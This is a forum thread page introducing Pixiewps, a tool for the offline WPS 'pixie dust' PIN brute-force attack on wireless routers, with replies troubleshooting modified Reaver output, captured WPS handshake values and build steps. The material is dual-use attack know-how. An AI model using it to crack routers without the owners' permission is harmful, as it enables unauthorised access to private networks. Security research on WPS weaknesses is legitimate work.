Page 1 of 25 12311 ... LastLast
Results 1 to 10 of 243

Thread: Pixiewps: wps pixie dust attack tool

  1. #1
    Member
    Join Date
    Mar 2015
    Posts
    47

    Pixiewps: wps pixie dust attack tool

    Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only.

    As opposed to the traditional online bruteforce attack, implemented in tools like Reaver or Bully which aim to recover the pin in a few hours, this method can get the pin in only a matter of milliseconds to minutes, depending on the target, if vulnerable.



    Brief description: Offline WPS bruteforce utility
    Repository: GitHub
    License: GNU GPLv3+
    Latest release: v1.2.2

    To work properly it requires a modified version of Reaver or Bully (neither versions are maintained by me):
    Modded Reaver by t6_x and datahead: GitHub
    Modded Bully by aanarchyy: GitHub (still in development/testing)

    A non-exhaustive list of vulnerable devices (not maintained by me): here

    Thread where it all started: WPS Pixie Dust Attack (Offline WPS Attack)

    References:
    1. Video presentation
    2. Slide presentation
    Last edited by wiire; 2016-01-05 at 02:35 PM.

  2. #2
    Member
    Join Date
    Mar 2013
    Posts
    40
    Only One Question. is this work with Broadcom Chipset Too or still it only works with ralink Chipset Only ??

  3. #3
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    516
    Ralink and some broadcom, not all

  4. #4
    Member
    Join Date
    Mar 2013
    Posts
    40
    Problem .....
    Modified Reaver Not Showing Publick Key (pke)..

    Trying pin 00005678.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    > N1 Enrollee Nonce: f8:49:5a:df:00:b7:0b:9b:6c:cc:64:2d:11:c8:89:52
    [+] Received M1 message
    > AuthKey: ce:cc:a5:98:fb:a8:5c:c7:7b:5f:1a:a2:be:ca:1b:b5:40 :27:72:a3:3e:d7:4b:db:dd:78:bf:3c:02:bc:51:aa
    [+] Sending M2 message
    > E-Hash1: 75:26:1a:d3:bd:73:ed:8e:3e:15:3b:aa:33:b0:dd:92:03 :0b:93:7e:93:cb:c0:ec:34:64:9b:06:ea:61:71:8b
    > E-Hash2: 01:d6:8f:f1:9d:3d:da:52:3c:45:42:2f:5f:55:f2:3a:0c :00:3f:f2:ae:bf:9c:7b:12:6e:ee:56:89:2c:52:d3
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 2
    [+] Pin count advanced: 2. Max pin attempts: 11000
    [+] Trying pin 01235678.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    > N1 Enrollee Nonce: 27:2b:38:0d:fc:3a:17:06:d4:7d:d3:09:4d:86:87:95
    [+] Received M1 message
    > AuthKey: 51:29:84:ca:f5:96:d2:b8:f3:90:9f:81:1f:3e:48:57:2e :5c:b1:81:13:83:84:66:86:82:d3:5b:1b:9b:75:ab
    [+] Sending M2 message
    > E-Hash1: 87:0f:45:30:2f:61:61:53:88:cb:b6:23:e9:ea:d5:22:9a :c4:c3:62:ff:2a:02:b7:99:a1:9d:99:d9:45:f7:82
    > E-Hash2: f9:51:2a:a4:3f:79:e7:67:28:f7:37:f4:31:a7:17:ca:75 :e8:b8:3b:31:25:4a:13:60:c5:82:f5:ef:a7:cc:8f
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 3

  5. #5
    Member
    Join Date
    Oct 2014
    Posts
    44
    @ FurqanHanif
    you can get it out M1,M2 messages in wireshark.
    there's also tshark.sh script that can grab it for you. I forgot where I got it, I think it was part of wpsoffline tool download.
    but make sure it's all part of one conversation (pin attempt). I just make the reaver to test one pin at a time and capture.

  6. #6
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    516
    Did you install the new reaver? Check out the YouTube video. You don't need wire shark at all.

  7. #7
    Member
    Join Date
    Mar 2013
    Posts
    40
    @soxrok2212 i already Mentioned that it's Modified Reaver.. and i also i downloaded it from You Tube Link. i Tried this on Five Routers but it don't giving me Same Output For All (No PKE ) ...
    @wn722 Which one is Pke exactly from This ??
    M1 wps.enrollee_nonce : e1123ae1a03001165f243ba7a2a19475
    M2 wps.enrollee_nonce : e1123ae1a03001165f243ba7a2a19475
    M2 wps.registrar_nonce : 5180afc40d4ca3e31d25affd14e78d1e
    M2 wps.authenticator : 72da6b2102198192
    M3 wps.registrar_nonce : 5180afc40d4ca3e31d25affd14e78d1e
    M3 wps.authenticator : 80c4d98ffd706201
    M3 wps.e_hash1 : 6e2cc52a5a22c84e19f701dc8153eb805fc0b247e06178ec3b 01b7b8202ab69a
    M3 wps.e_hash2 : 51f0f1b6c9b828345094b535a3c1e120bad0c94f03bc5790b9 de5ae40037224d
    M4 wps.enrollee_nonce : e1123ae1a03001165f243ba7a2a19475
    M4 wps.authenticator : 8824706540ab0f4d
    M4 wps.encrypted_settings : 20bfe3939b2872273204fc93dd52d4ec25b68a23e596630712 b3404cdb1eb125fb3f4e96a8db05a754d5eeb98940728ea243 e8925b0d968fac70fc5bf71b8a36
    M4 wps.r_hash1 : b1eea2314f81f2e3d40afbe5af5c19b61bcb7f955d57f61630 6a696da347f0e5
    M4 wps.r_hash2 : eaf1b41b28edb43b6feeafdad792500a34482ec1b2b6ad8e97 4288230648e38c
    Last edited by FurqanHanif; 2015-04-03 at 01:42 PM.

  8. #8
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    516
    Did you move reaver to bin after you compiled?

  9. #9
    Senior Member
    Join Date
    Sep 2013
    Posts
    258
    Before trying the tool i really want to say to you " thank you so much wiire!"
    For all your great work and above all all your explanations all the way long (and for releasing a GPL v3 code)

    - to work on a modified version of Reaver/Bully
    We can see that it comes form the heart and that it must have been a "pain in th-censurde-ss" at some points.

    Thank you so much wiire!

  10. #10
    Member
    Join Date
    Mar 2013
    Posts
    40
    Quote Originally Posted by soxrok2212 View Post
    Did you move reaver to bin after you compiled?
    ./configure
    make
    make install


    i think it overwrite the existing Reaver ( because existing reaver not showing the enrolle/E-HASH stuff but installing modified reaver showing enrolle/E-Hash stuff but not showing PKE).. :/ So i think their is no need to copy reaver in Bin..

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •